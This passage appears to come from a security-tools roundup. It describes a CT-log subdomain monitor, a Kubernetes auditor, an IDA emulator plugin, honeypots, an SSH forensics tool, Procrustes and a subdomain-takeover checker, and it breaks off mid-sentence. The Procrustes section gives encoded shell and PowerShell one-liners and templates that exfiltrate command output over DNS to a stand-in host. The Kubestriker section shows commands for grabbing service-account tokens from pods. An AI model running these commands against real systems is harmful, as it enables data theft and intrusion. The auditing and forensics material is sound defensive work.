  • Monitoring Real Time CT log feed and extracting the domain names from that feed
  • Matching the extracted subdomains/domains against the domains/Keywords to be matched
  • Sending a Slack notification if a domain name matches

Requirements :
  • A VPS (UNIX up and running)
  • Python 3x (Tested with Python 3.6.9)
  • Slack Workspace (optional)

Setup

I am assuming that you are already done with your Slack workspace setup.

Now create a channel named “subdomain-monitor” and set up an incoming webhook


Enabling Slack Notifications :

Edit the config.yaml file and paste your Slack webhook URL there; it should look something like this



Keywords and domains to match :

You can specify keywords and domains to match in the domains.yaml file.

For Matching subdomains :



Note : Notice the preceding dot [ . ]

Let's take “.facebook.com” as an example: domains extracted from the real-time CT logs will be matched against “.facebook.com”, and on a match they will be logged in our output file (found-domains.log). The thing to note here is that this will give some false positives like “test.facebook.com.test.com” and “example.facebook.company”, but we can filter those out later with some regex magic.
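The suffix matching and false-positive filtering described above can be sketched in Python (this is a hypothetical helper for illustration, not CertEagle's actual code):

```python
import re

def matches_suffix(domain: str, suffix: str) -> bool:
    """Return True only when `domain` really ends with the configured
    suffix (e.g. ".facebook.com"), rejecting look-alikes such as
    "test.facebook.com.test.com" or "example.facebook.company"."""
    # Anchor the suffix at the end of the name and require a label
    # boundary (start of string or a dot) right before it.
    pattern = re.compile(r'(^|\.)' + re.escape(suffix.lstrip('.')) + r'$')
    return bool(pattern.search(domain))

print(matches_suffix("login.facebook.com", ".facebook.com"))         # True
print(matches_suffix("test.facebook.com.test.com", ".facebook.com"))  # False
print(matches_suffix("example.facebook.company", ".facebook.com"))    # False
```

A plain substring check (`".facebook.com" in domain`) would accept both false-positive examples; anchoring the pattern at the end of the name is what filters them out.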


For Matching domains/subdomains with specific keywords :

Let's assume you want to monitor and log domains/subdomains that contain the word “hackerone”; in that case our domains.yaml file will look something like this



Now all extracted domains/subdomains containing the word “hackerone” will be matched and logged (and a Slack notification will be sent to you for each match)

Okay, we are done with the initial setup. Let's install the required dependencies and run the tool:

$ pip3 install -r requirements.txt

$ python3 certeagle.py



Matched domains will look like this :


 

Slack Notifications will look like this :



Output files :

The program will keep running; all matched domains are saved under the output directory in the found-domains.log file



Strict Warning : Do not monitor assets of any organisation without prior consent


Inspiration

Sublert

Phishing Catcher


Contact

Shoot my DM : @0xAsm0d3us


#Offtopic but Important

This COVID pandemic affected animals too (in an indirect way). I will be more than happy if you show some love for animals by donating to Animal Aid Unlimited, which saves animals through street animal rescue, spay/neuter and education. Their mission is dedicated to the day when all living beings are treated with compassion and love.



Kubestriker - A Blazing Fast Security Auditing Tool For Kubernetes



Kubestriker performs numerous in-depth checks on Kubernetes infrastructure to identify the security misconfigurations and challenges that DevOps engineers/developers are likely to encounter when using Kubernetes, especially in production and at scale.


Kubestriker is platform agnostic and works equally well across more than one platform, such as self-hosted Kubernetes, Amazon EKS, Azure AKS, Google GKE etc.



How To Install

Clone the repo and install

To install this tool or clone and run this application, you'll need Git, Python 3 and pip installed on your computer. It is advised to install this tool in a virtual environment.

From your command line:

# Create python virtual environment
$ python3 -m venv env

# Activate python virtual environment
$ source env/bin/activate

# Clone this repository
$ git clone https://github.com/vchinnipilli/kubestriker.git

# Go into the repository
$ cd kubestriker

# Install dependencies
$ pip install -r requirements.txt

# In case of prompt toolkit or selectmenu errors
$ pip install prompt-toolkit==1.0.15
$ pip install -r requirements.txt

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target

Install using pip

To install and run this application, you'll need pip installed on your computer. From your command line:

# Create python virtual environment
$ python3 -m venv env

# Activate python virtual environment
$ source env/bin/activate

# Install using pip
$ pip install kubestriker

# In case of prompt toolkit or selectmenu errors
$ pip install prompt-toolkit==1.0.15
$ pip install kubestriker

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target

How to spin up kubestriker container

Use this link to view the Kubestriker container latest releases

# Spinning up the kubestriker Container
$ docker run -it --rm -v /Users/vasantchinnipilli/.kube/config:/root/.kube/config -v "$(pwd)":/kubestriker --name kubestriker cloudsecguy/kubestriker:v1.0.0

# Replace the user vasantchinnipilli above with your username or absolute path of kube config file
$ docker run -it --rm -v /Users/<yourusername>/.kube/config:/root/.kube/config -v "$(pwd)":/kubestriker --name kubestriker cloudsecguy/kubestriker:v1.0.0

# Gearing up Kubestriker
$ python -m kubestriker

# Result will be generated in the current working directory with the name of the target



Types of Scans

Authenticated scans

An authenticated scan expects the user to have at least read-only privileges and to provide a token during the scan. Please use the links below to create read-only users:

Create read-only user for Amazon eks
Create read-only user for Azure aks
Create read-only user for Google gke
Create a subject using Role based access control

# To grab a token from eks cluster
$ aws eks get-token --cluster-name cluster-name --region ap-southeast-2

# To grab a token from aks cluster
$ az aks get-credentials --resource-group myResourceGroup --name myAKSCluster

# To grab a token from gke cluster
$ gcloud container clusters get-credentials CLUSTER_NAME --zone=COMPUTE_ZONE

# To grab a token from service account
$ kubectl -n namespace get secret serviceaccount-token -o jsonpath='{.data.token}'

# To grab a token from a pod directly or via command execution bug
$ cat /run/secrets/kubernetes.io/serviceaccount/token
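The token returned by the `kubectl get secret ... jsonpath` command above comes base64-encoded, since values in a secret's `.data` map are always base64. A quick standard-library sketch (using a short stand-in value, not a real service-account JWT) shows the decoding step:

```python
import base64

# Stand-in for the value printed by:
#   kubectl -n namespace get secret serviceaccount-token -o jsonpath='{.data.token}'
# (a real token is a long JWT; this short fake is for illustration only)
encoded = base64.b64encode(b"eyJhbGciOiJSUzI1NiJ9.payload.sig").decode()

# Decode before using the token, e.g. as an Authorization: Bearer header
token = base64.b64decode(encoded).decode()
print(token)
```

The token read directly from `/run/secrets/kubernetes.io/serviceaccount/token` inside a pod, by contrast, is already decoded and can be used as-is.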

Unauthenticated scans

An unauthenticated scan will succeed in case anonymous access is permitted on the target cluster


Identifying an open Insecure port on kubernetes master node



Identifying a worker Node with kubelet readwrite and readonly ports open



Current Capabilities
  • Scans Self Managed and cloud provider managed kubernetes infra
  • Reconnaissance phase checks for various services or open ports
  • Performs automated scans in case insecure, read-write or read-only services are enabled
  • Performs both authenticated scans and unauthenticated scans
  • Scans for wide range of IAM Misconfigurations in the cluster
  • Scans for wide range of Misconfigured containers
  • Scans for wide range of Misconfigured Pod Security Policies
  • Scans for wide range of Misconfigured Network policies
  • Scans the privileges of a subject in the cluster
  • Run commands on the containers and streams back the output
  • Provides the endpoints of the misconfigured services
  • Provides possible privilege escalation details
  • Elaborative report with detailed explanation

Future improvements
  • Automated exploitation based on the issues identified
  • API and CI/CD automation friendly
  • A Decent FrontEnd to make the lives easier

Suggestions

Kubestriker is open source and emailware. Meaning, if you liked using this tool, or it has helped you in any way, or if you have any suggestions/improvements, I'd like you to send me an email at vchinnipilli@gmail.com about anything you'd want to say about this tool. I'd really appreciate it!


Support

Vasant Chinnipilli builds and maintains Kubestriker to audit and secure Kubernetes infrastructure.

Start with the Documentation, which will be available soon, for quick tutorials and examples.

If you need direct support you can contact me at vchinnipilli@gmail.com.



uEmu - Tiny Cute Emulator Plugin For IDA Based On Unicorn.



uEmu is a tiny cute emulator plugin for IDA based on unicorn engine.

Supports the following architectures out of the box: x86, x64, ARM, ARM64, MIPS, MIPS64


What is it GOOD for?
  • Emulate bare metal code (bootloaders, embedded firmware etc)
  • Emulate standalone functions

What is it BAD for?
  • Emulate complex OS code (dynamic libraries, processes etc)
  • Emulate code with many syscalls

What can be improved?
  • Find a way to emulate vendor specific register access (like MSR S3_x, X0 for ARM64)
  • Add more registers to track

Installation
  • brew install unicorn to install Unicorn binaries
  • pip install unicorn to install Unicorn python bindings
  • Use File / Script file... or ALT+F7 in IDA to load uEmu.py

Optionally, uEmu can be loaded automatically as an IDA plugin. In this case, put it into the [IDA]/Plugins folder and change USE_AS_SCRIPT to False inside uEmu.py

Note: on Windows you might need to add the IDA Pro Qt5 path

import sys
sys.path.append('D:\\Soft\\IDA Pro 7.x\\python\\3\\PyQt5')


Chameleon - Customizable Honeypots For Monitoring Network Traffic, Bots Activities And Username\Password Credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, SMTP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres And MySQL)



Customizable honeypots for monitoring network traffic, bot activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, SMTP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres and MySQL)


Grafana Interface



NMAP Scan



Credentials Monitoring



General Features
  • Modular approach (honeypots run as scripts or imported as objects)
  • Most honeypots serve as full servers (only a few emulate the application-layer protocols)
  • Servers can be configured with a username, password and banner (default username and password are test)
  • ICMP, DNS, TCP and UDP payloads are parsed and checked against common patterns
  • Visualized Grafana interfaces for monitoring the results (Filter by IP - default is all)
  • Unstructured and structured logs are parsed and inserted into Postgres
  • All honeypots contain clients for testing the servers
  • All ports are opened and monitored by default
  • Easy automation and can be deployed on AWS ec2
  • & More features to Explore

Install and run

Docker standalone (simple)
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
# choose which honeypot http, https, ssh etc and use -p in docker for the ports
docker build -t honeypot ./honeypot/. && docker run -p 9999:9999 -p 9998:9998 -it honeypot --mode normal --servers "ssh:9999 http:9998"

On ubuntu 18 or 19 System (Auto-configure)
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
chmod +x ./run.sh
./run.sh auto_configure

The Grafana interface http://localhost:3000 will open automatically after the initialization process finishes (username is changeme457f6460cb287 and password is changemed23b8cc6a20e0)

Wait for a few seconds until honeypot shows the IP address

...
honeypot_1 | Your IP: 172.19.0.3
honeypot_1 | Your MAC: 09:45:aa:23:10:03
...

You can interact with the honeypot from your local system

ping 172.19.0.3
or run any network tool against it
nmap 172.19.0.3

On ubuntu 18 or 19 System (Auto-configure test)
git clone https://github.com/qeeqbox/chameleon.git
cd chameleon
chmod +x ./run.sh
./run.sh auto_test

The Grafana interface http://localhost:3000 will open automatically after the initialization process finishes (username is admin and password is admin)


Or, import your desired non-blocking server as an object (SSH server)
copy ssh_server.py to your folder
# ip= String E.g. 0.0.0.0
# port= Int E.g. 9999
# username= String E.g. Test
# password= String E.g. Test
# mocking= Boolean or String E.g OpenSSH 7.0
# logs= String E.g db, terminal or all
# --------------------------------------------------------------------
# always remember to add process=true to run_server() for non-blocking

from ssh_server import QSSHServer
qsshserver = QSSHServer(port=9999)
qsshserver.run_server(process=True)
qsshserver.test_server(port=9999)
qsshserver.kill_server()
ssh test@127.0.0.1
INFO:chameleonlogger:['servers', {'status': 'success', 'username': 'test', 'ip': '127.0.0.1', 'server': 'ssh_server', 'action': 'login', 'password': 'test', 'port': 38696}]
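As a rough illustration of the server pattern shown above, here is a minimal, standard-library TCP banner honeypot that records who connected. This is not Chameleon's code; the banner string, port choice and logging are illustrative stand-ins:

```python
import socket
import socketserver
import threading

class BannerHoneypot(socketserver.BaseRequestHandler):
    """Send a fake service banner, then record the peer and its first bytes."""
    connections = []  # shared, append-only log of (ip, first_bytes)

    def handle(self):
        self.request.sendall(b"SSH-2.0-OpenSSH_7.0\r\n")  # fake banner
        data = self.request.recv(1024)
        BannerHoneypot.connections.append((self.client_address[0], data))

# Port 0 lets the OS pick a free port; a real honeypot would bind 22, 9999, etc.
server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), BannerHoneypot)
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# Pose as a probing client, much like Chameleon's bundled test clients
with socket.create_connection(("127.0.0.1", port)) as client:
    banner = client.recv(1024)
    client.sendall(b"SSH-2.0-probe\r\n")

server.shutdown()
server.server_close()
print(banner.decode().strip())
```

Chameleon's real servers layer protocol emulation, credential capture and Postgres logging on top of this basic accept/banner/record loop.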

Raspberry Pi 3B+ (set up zram first to avoid lockups)

Requirements (Servers only)
apt-get update -y && apt-get install -y iptables-persistent tcpdump nmap iputils-ping python python-pip python-psycopg2 lsof psmisc dnsutils
pip install scapy netifaces pyftpdlib sqlalchemy pyyaml paramiko==2.7.1 impacket twisted rdpy==1.3.2 psutil requests
pip install -U requests[socks]
pip install -Iv rsa==4.0

Current Servers/Emulators
  • DNS (Server using Twisted)
  • HTTP Proxy (Server using Twisted)
  • HTTP (Server using Twisted)
  • HTTPS (Server using Twisted)
  • SSH (Server using socket)
  • POP3 (Server using Twisted)
  • IMAP (Server using Twisted)
  • SMTP (Server using smtpd)
  • RDP (Server using Twisted)
  • SMB (Server using impacket)
  • SOCKS5 (Server using socketserver)
  • TELNET (Server using Twisted)
  • VNC (Emulator using Twisted)
  • Postgres (Emulator using Twisted)
  • Redis (Emulator using Twisted)
  • Mysql (Emulator using Twisted)
  • Elasticsearch (Coming..)
  • Oracle (Coming..)
  • ldap (maybe)

Changes
  • 2020.V.01.05 added mysql
  • 2020.V.01.04 added redis
  • 2020.V.01.03 switched ftp servers to twisted
  • 2020.V.01.02 switched http and https servers to twisted
  • 2020.V.01.02 Fixed changing ip in grafana interface

Roadmap
  • Refactoring logging
  • Fixing logger
  • Code Cleanup
  • Switching some servers to twisted
  • Adding graceful connection close (error response)
  • Implementing the rest of servers
  • Adding some detection logic to the sniffer
  • Adding a control panel

Resources

Twisted and its documentation, Impacket and its documentation, Grafana and its documentation, Expert Twisted, robertheaton


Other Licenses

By using this framework, you are accepting the license terms of all these packages: grafana, tcpdump, nmap, psycopg, dnsutils, scapy, netifaces, pyftpdlib, sqlalchemy, pyyaml, paramiko, impacket, rdpy, psutil, requests, FreeRDP, SMBClient, tigervnc


Articles

redteaming.net, my-infosec-awesome


Disclaimer\Notes
  • Do not deploy without proper configuration
  • Setup some security group rules and remove default credentials
  • Almost all servers and emulators are stripped-down - You can adjust that as needed
  • Please let me know if I missed a resource or dependency


packetStrider - A Network Packet Forensics Tool For SSH



packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark.


The problem that packet strider aims to help with (AKA Why?)

SSH is obviously encrypted, yet valuable contextual information still exists within the network traffic that can speak to TTPs, intent, success and magnitude of actions on objectives. There may even exist situations where valuable context is not available on, or has been deleted from, hosts, so having an immutable and unalterable passive network capture gives additional forensic context. "Packets don't lie".

Separately to the forensic context, packet strider predictions could also be used in an active fashion, for example to shun/RST forward connections if a tunneled reverse SSH session initiation feature is predicted within, even before reverse authentication is offered.


The broad techniques of packet strider (AKA How?)
  • Builds a rich feature set in the form of pandas dataframes. Over 40 features are engineered from packet metadata such as SSH Protocol message content, normalized statistics, direction, size, latency and sliding window features.
  • Strides through this feature set numerous times using sliding windows (Inspired by Convolutional Neural networks) to predict:
    • The use of the -R option in the forward session: this is what enables a Reverse connection to be made later in the session. This artefact is discovered very early in the session, directly after the forward session is authenticated. This is the first available warning sign that Reverse sessions are possible.
    • Initiation of the Reverse SSH session, this can occur at any point (early, or late) in the forward session. This is discovered prior to the Reverse session being authenticated successfully. This is the second warning sign, in that a reverse session has just been requested and setup for authentication.
    • Success and/or Failure of the Reverse session authentication. This is the third and final warning sign, after this point you know someone is on your host, inside a reverse session.
    • The use of the -A option (SSH Agent Forwarding), which enables the client to share its local SSH private keys with the server. This functionality is generally considered dangerous. References: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident, https://skylightcyber.com/2019/09/26/all-your-cloud-are-belong-to-us-cve-2019-12491/, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12491
    • All predictions and metadata reports on a stream by stream basis.
    • Human or scripted, based on timing deltas.
    • Is the server already known to the client, or was this the first time a connection between the two has been made? This is determined through packet deltas associated with known_hosts.
    • Whether a client certificate or password auth was used, and whether the password length is 8 characters or less.
    • keystrokes, delete key press, enter key presses (cut and paste and up/down is YMMV/experimental).
    • exfil/infil data movement predictions in both Forward and Reverse sessions.
    • Works on interactive sessions as well as file based ssh file transfer apps (eg scp, putty, cyberduck etc).

Getting started

Python 3 has been used, and you will need the following modules (YMMV on Python 2):

pip3 install pandas matplotlib pyshark

Usage:

python3 packetStrider-ssh.py -h

Output:

usage: packetStrider-ssh.py [-h] [-f FILE] [-n NSTREAM] [-m] [-k] [-p]
[-z ZOOM] [-d DIRECTION] [-o OUTPUT_DIR]
[-w WINDOW] [-s STRIDE]

packetStrider-ssh is a packet forensics tool for SSH. It creates a rich
feature set from packet metadata such SSH Protocol message content, direction,
size, latency and sequencing. It performs pattern matching on these features,
using statistical analysis, and sliding windows to predict session initiation,
keystrokes, human/script behavior, password length, use of client
certificates, context into the historic nature of client/server contact and
exfil/infil data movement characteristics in both Forward and Reverse sessions

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE pcap file to analyze
-n NSTREAM, --nstream NSTREAM
Perform analysis only on stream n
-m, --metaonly Display stream metadata only
-k, --keystrokes Perform keystroke prediction
-p, --predict_plot Plot data movement and keystrokes
-z ZOOM, --zoom ZOOM Narrow down/zoom the analysis and plotting to only
packets "x-y"
-d DIRECTION, --direction DIRECTION
Perform analysis on SSH direction : "forward",
"reverse" OR "both"
-o OUTPUT_DIR, --output_dir OUTPUT_DIR
Directory to output plots
-w WINDOW, --window WINDOW
Sliding window size, # of packets to side of window
center packet, default is 2
-s STRIDE, --stride STRIDE
Stride between sliding windows, default is 1

Example

The pcap "forward_reverse.pcap" is from a common TTP of a Reverse SSH shell, a favorite of red teams everywhere. Specifically the following commands were used, to highlight the capabilities of packet strider in a simple way:

  • Forward connection from victim

    • The command for the forward session was ssh user@1.2.3.4 -R 31337:localhost:22 which binds local port 31337 ready for the reverse SSH connection back to the victim PC. This connection can be effected in many ways including manually, by an RCE, SSRF, or some form of persistence. For the purpose of this demo, it is a manual standard forward session.
    • This was NOT the first time the client has seen the server; we see this because the delta for related packets was very small: the server's key fingerprint was already in the client's known_hosts, so the user was not prompted to add it, which would have increased packet latency.
    • Two consecutive failed password logins by a human, followed by a successful login with an 8+ character password.
  • ls is typed in the forward session, in this sequence: 'l' 'w' 'w' 'back-space' 'back-space' 's' and then enter. The total size of data transmitted over the wire (as the output of ls) is classified as infiltration, given that it is inbound.
  • Now on the attacker's machine (the server), a reverse shell is initiated back to the victim:

    • ssh victim@localhost -p 31337. At this point, which is even before authentication process begins, packet strider has identified the Reverse session SSH initiation, at packet 72
    • Now the attacker has a reverse shell on the victim host. From here they can turn off history settings and run whatever lateral movement or ransacking hijinks they desire. The simple examples in this demo are initial user recon.
    • last is run in the form of keystrokes 'l' 'a' 's' 'r' 'delete' 't' 'enter'
    • whois run in the form of 'w' 'h' 'o' 'enter'
    • exit is run in the form of 'e' 'x' 'i' 't'
  • Then finally the forward session is closed, just to demonstrate that forward SSH feature detection still works.

    • exit

Network traffic from this activity is saved to tcpdump.pcap and now it's time to run Packet Strider.

python3 packetStrider-ssh.py -f tcpdump.pcap -k -p -o out



This plot shows a timeline of key predictions (image has been annotated here)



This plot shows some window statistics, useful for a deep dive and experimenting with features.



This plot shows a simple histogram



Inspiration

This project was done as a personal proof of concept and a way for me to practice with some data science libraries in Python. It was heavily inspired by my Coursera studies in machine learning and data science, in particular the pandas library and the way in which convolutional neural networks (CNNs) "stride" through image pixel sets using sliding windows to detect certain features within.


Tips

Packet Strider does a vast amount of "striding" in full-capacity mode. This can result in substantial resource usage if the pcap is large, or more precisely if there are many packets in the pcap. Here are some speed-up tips; these are particularly useful for an initial run, for example just to see whether reverse SSH activity is predicted, before adding functionality as desired.

  • Ensure you are running with the latest patches of modules that do some heavy lifting, eg pyshark/tshark, pandas and matplotlib.
  • The -p --predict_plot option is the most intensive operation. Think about just running with the output to terminal, and then see if you'd like this plotted.
  • Use the -m --metaonly option. This only retrieves the high level metadata such as Protocol names and HASSH data. This can be useful to quickly determine if you are dealing with an interactive session using OpenSSH, or with a file transfer client like Cyberduck.
  • Pre filter the pcap to the ssh traffic.
  • Pre filter the pcap to the stream you want, which you may have learned by previously running with the speedy -m --metaonly option. You can examine only stream "NSTREAM" with the "-n NSTREAM" option, or you can pre filter with wireshark etc.
  • There may be times when you identify something interesting in a subset of a very large packet set. Here you can use the zoom feature to only examine and plot the packets in the region you are interested in. Use -z ZOOM, --zoom ZOOM for this. eg -z 100-500
  • Most times you will be interested in understanding keystroke activity, so while not using the -k option will save processing speed, it also means you won't get this valuable insight.

TODO
  • More protocols!
  • Look at Multi threading and see where this can help processing speed.
  • Improve efficiency of script, particularly plotting times.
  • Improve the Pasting indicator
  • Improve the 'up/down' key indicator
  • Annotate plots with imagemagick or similar
  • Improve the reporting function, write out to disk.
  • The Reverse key indicator is conservative, because packet encapsulation can potentially report two keystrokes. This issue does not exist for forward keystrokes, as the packet order has been handled in case packets arrive out of order. Examine options here.
  • Port to golang for speed
  • Real time mode
  • Examine the effect of additional tunneling local ports over the forward connection.

Disclaimer

Use at your own risk. See License terms.



Procrustes - A Bash Script That Automates The Exfiltration Of Data Over DNS In Case We Have A Blind Command Execution On A Server Where All Outbound Connections Except DNS Are Blocked


A bash script that automates the exfiltration of data over DNS in case we have a blind command execution on a server where all outbound connections except DNS are blocked. The script currently supports sh, bash and powershell and is compatible with exec-style command execution (e.g. java.lang.Runtime.exec).

Unstaged:


  

Staged:

 

For its operation, the script takes as input the command we want to run on the target server and transforms it according to the target shell in order to allow its output to be exfiltrated over DNS. After the command is transformed, it is fed to the "dispatcher". The dispatcher is a program provided by the user and is responsible for taking a command as input and having it executed on the target server by any means necessary (e.g. exploiting a vulnerability). Once executed on the target server, the command is expected to trigger DNS requests to our name server containing chunks of our data. The script listens for those requests until the output of the user-provided command is fully exfiltrated.

Below are the supported command transformations, generated for the exfiltration of the command: ls

sh:

sh -c $@|base64${IFS}-d|sh . echo IGRpZyBAMCArdHJpZXM9NSBgKGxzKXxiYXNlNjQgLXcwfHdjIC1jYC5sZW4xNjAzNTQxMTc4LndoYXRldi5lcgo=

bash:

bash -c {echo,IG5zbG9va3VwIGAobHMpfGJhc2U2NCAtdzB8d2MgLWNgLmxlbi4xNjAzMDMwNTYwLndoYXRldi5lcgo=}|{base64,-d}|bash

powershell:

powershell -enc UgBlAHMAbwBsAHYAZQAtAEQAbgBzAE4AYQBtAGUAIAAkACgAIgB7ADAAfQAuAHsAMQB9AC4AewAyAH0AIgAgAC0AZgAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAoAGwAcwApACkAKQAuAGwAZQBuAGcAdABoACkALAAiAGwAZQBuACIALAAiADEANgAwADMAMAAzADAANAA4ADgALgB3AGgAYQB0AGUAdgAuAGUAcgAiACkACgA=

Usage
  1. Local testing for bash:
./procroustes_chunked.sh -h whatev.er -d "dig @0 +tries=5" -x dispatcher_examples/local_bash.sh -- 'ls -lha|grep secret' < <(stdbuf -oL tcpdump --immediate -l -i any udp port 53)
  2. Local testing for powershell with WSL2:
stdbuf -oL tcpdump --immediate -l -i any udp port 53|./procroustes_chunked.sh -w ps -h whatev.er -d "Resolve-DnsName -Server wsl2_IP -Name" -x dispatcher_examples/local_powershell_wsl2.sh -- 'gci | % {$_.Name}'
  3. Powershell example where we ssh into our NS to get the incoming DNS requests:
./procroustes_chunked.sh -w ps -h yourdns.host -d "Resolve-DnsName" -x dispatcher_examples/curl_waf.sh -- 'gci | % {$_.Name}' < <(stdbuf -oL ssh user@HOST 'sudo tcpdump --immediate -l udp port 53')
  4. More information on the options:
./procroustes_chunked.sh --help

procroustes_chunked vs procroustes_full

In a nutshell, assuming we want to exfiltrate some data that has to be broken into four chunks in order to be transmitted over DNS:

  • procroustes_chunked: calls the dispatcher four times, each time requesting a different chunk from the server. It has relatively small payload size, it's fast and doesn't need any special configuration.
  • procroustes_full: calls the dispatcher once, the command that will get executed on the server will be responsible for chunking the data and sending them over. It can have bigger payload size, it's fast (speed can be tuned through the -t parameter) and its speed can be further optimized when the dns_server is running on the name server.
  • procroustes_full/staged: same as procroustes_full, but uses a stager to get the command used by procroustes_full to chunk the data. It has the smallest "payload" size but is also the slowest with regards to exfiltration rate since the actual payload is downloaded over DNS. For its operation it requires the creation of an nsconfig script. Note: the nsconfig script should be created only once per name server (and not per target server).

Some of their differences can also be illustrated through the template commands used for bash:

procroustes_chunked/bash:

%DNS_TRIGGER% `(%CMD%)|base64 -w0|cut -b$((%INDEX%+1))-$((%INDEX%+%COUNT%))'`.%UNIQUE_DNS_HOST%

procroustes_full/bash:

(%CMD%)|base64 -w0|echo $(cat)--|grep -Eo '.{1,%LABEL_SIZE%}'|xargs -n%NLABELS% echo|tr ' ' .|awk '{printf "%s.%s%s\n",$1,NR,"%UNIQUE_DNS_HOST%"}'|xargs -P%THREADS% -n1 %DNS_TRIGGER%

procroustes_full/bash/staged:

(seq %ITERATIONS%|%S_DNS_TRIGGGER% $(cat).%UNIQUE_DNS_HOST%|tr . \ |printf %02x $(cat)|xxd -r -p)|bash
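The chunking done by the procroustes_full template above (base64-encode the output, split it into labels of LABEL_SIZE, group NLABELS labels per query name, then append a sequence number and the unique host) can be mirrored in a Python sketch. The label and group sizes are illustrative defaults, and the real script also has to handle base64 characters that are not DNS-safe ('+', '/', '='):

```python
import base64
import textwrap

def to_dns_queries(data: bytes, host: str, label_size=60, nlabels=3):
    """Pack `data` into DNS query names of the form
    chunk1.chunk2.chunk3.<seq>.<host>, mirroring the bash template."""
    b64 = base64.b64encode(data).decode()
    labels = textwrap.wrap(b64, label_size)  # the .{1,LABEL_SIZE} grouping
    queries = []
    for seq, start in enumerate(range(0, len(labels), nlabels), 1):
        chunk = ".".join(labels[start:start + nlabels])
        queries.append(f"{chunk}.{seq}.{host}")
    return queries

# 300 bytes of output -> 400 base64 chars -> 7 labels -> 3 query names
queries = to_dns_queries(b"A" * 300, "whatev.er")
print(len(queries))
print(queries[0][-12:])
```

On the listening side, the script reassembles the payload by stripping the host suffix, ordering chunks by the embedded sequence number, and base64-decoding the concatenated labels.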

| | procroustes_chunked | procroustes_full | procroustes_full_staged |
| --- | --- | --- | --- |
| payload size overhead (bash/powershell) | 150*NLABELS/500*NLABELS (+CMD_LEN) | 300/800 (+CMD_LEN) | 150/400 [1] |
| dispatcher calls | #output/(LABEL_SIZE*NLABELS) [2] | 1 | 1 |
| speed (bash/powershell) | ✓/✓ | ✓/✓ | ✓/✓ [3] |
| configuration difficulty | easy | easy | medium |

[1] For the staged version, the command is downloaded through DNS, so the listed size is the total payload size as well.

[2] With procroustes_chunked, the dispatcher is called multiple times, and so is the provided command that is supposed to be executed on the server (until all its output is exfiltrated). This behavior is not ideal in case the delivery of commands to the server (i.e. by calling the dispatcher) is time/resource intensive.

It may also cause problems when the command we are executing on the server is not idempotent (functionality- or output-wise, e.g. "ls;rm file") or is time/resource intensive (e.g. find / -name secret). A workaround for this case is to first store the command output in a file (e.g. /tmp/file) and then use the script to read that file.

[3] In the staged version we have the overhead of the time required to get the actual payload over DNS. It should be noted that the script makes use of A records to get the actual payload. Even though this allows our traffic to blend in better with the regular traffic of the target environment, it offers limited channel capacity (e.g. 4 bytes per request). We could make use of other record types like TXT and minimize the stage download time (close to zero) and the stager size.
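The 4-bytes-per-request figure comes from an A record's answer being a single IPv4 address. A minimal sketch of how a payload could be packed into and recovered from such answers (this is an illustration, not DNSlivery's actual encoding):

```python
import ipaddress

def bytes_to_a_records(payload: bytes):
    """Pack a payload into IPv4 addresses, 4 bytes per A record,
    zero-padding the tail (fine for text payloads)."""
    padded = payload + b"\x00" * (-len(payload) % 4)
    return [str(ipaddress.IPv4Address(padded[i:i + 4]))
            for i in range(0, len(padded), 4)]

def a_records_to_bytes(records):
    """Reassemble the payload from the answered addresses."""
    return b"".join(ipaddress.IPv4Address(r).packed for r in records).rstrip(b"\x00")
```

Each response thus carries only 4 payload bytes, which is why switching to TXT records would shrink the stage download time.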


Tips
  • You probably want to use this script as little as possible; try to transition to a higher bandwidth channel (e.g. HTTP webshell) as soon as possible
  • In case long text output is expected, you can try compressing it first to speed up the exfil process, e.g. ./procrustes_full.sh ... -o >(setsid gunzip) -- 'ls -lhR / | gzip'
  • Another possibility for big/binary files is to copy them to a path which is accessible for example through HTTP
  • For increased exfil bandwidth in procrustes_full, run the dns_server on your name server. That way, we avoid waiting for the underlying DNS_TRIGGER to timeout before moving on to a new chunk.
  • Ideally, you would have a domain (-h option) with an NS record pointing to a server you control (server where we run tcpdump). Nevertheless, in case the target is allowed to initiate connections to arbitrary DNS servers, this can be avoided by having the DNS trigger explicitly set to use our DNS server (e.g. dig @your_server whatev.er)

Credits
  • Collabfiltrator - idea of chunking the data on the server. It also provides functionality similar to this script, so check it out.
  • DNSlivery - modified version of DNSlivery is used as the DNS server



Sub404 - A Python Tool To Check Subdomain Takeover Vulnerability



Sub 404 is a tool written in Python which is used to check for the possibility of subdomain takeover vulnerabilities, and it is fast as it is asynchronous.


Why

During the recon process you might get a lot of subdomains (e.g. more than 10k). It is not possible to test each manually, or with the traditional requests or urllib approach, as it is very slow. Using Sub 404 you can automate this task in a much faster way. Sub 404 uses aiohttp/asyncio, which makes this tool asynchronous and faster.


How it works

Sub 404 takes a list of subdomains from a text file and checks for URLs returning a 404 Not Found status code; in addition, it fetches the CNAME (canonical name) and removes those URLs which have the target domain name in the CNAME. It also combines the results from subfinder and sublist3r (subdomain enumeration tools) if you don't already have the target's subdomains, as two is better than one. For this, sublist3r and subfinder must be installed on your system. Sub 404 is able to check 7K subdomains in less than 5 minutes.
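The CNAME filtering step described above can be sketched as a pure function; the (subdomain, status, cname) tuples are assumed to have already been gathered by the asynchronous aiohttp/DNS stage (this is an illustration, not the tool's actual code):

```python
def takeover_candidates(results, target_domain):
    """Keep 404-ing subdomains whose CNAME points outside the target
    domain -- those are the potential takeover targets.

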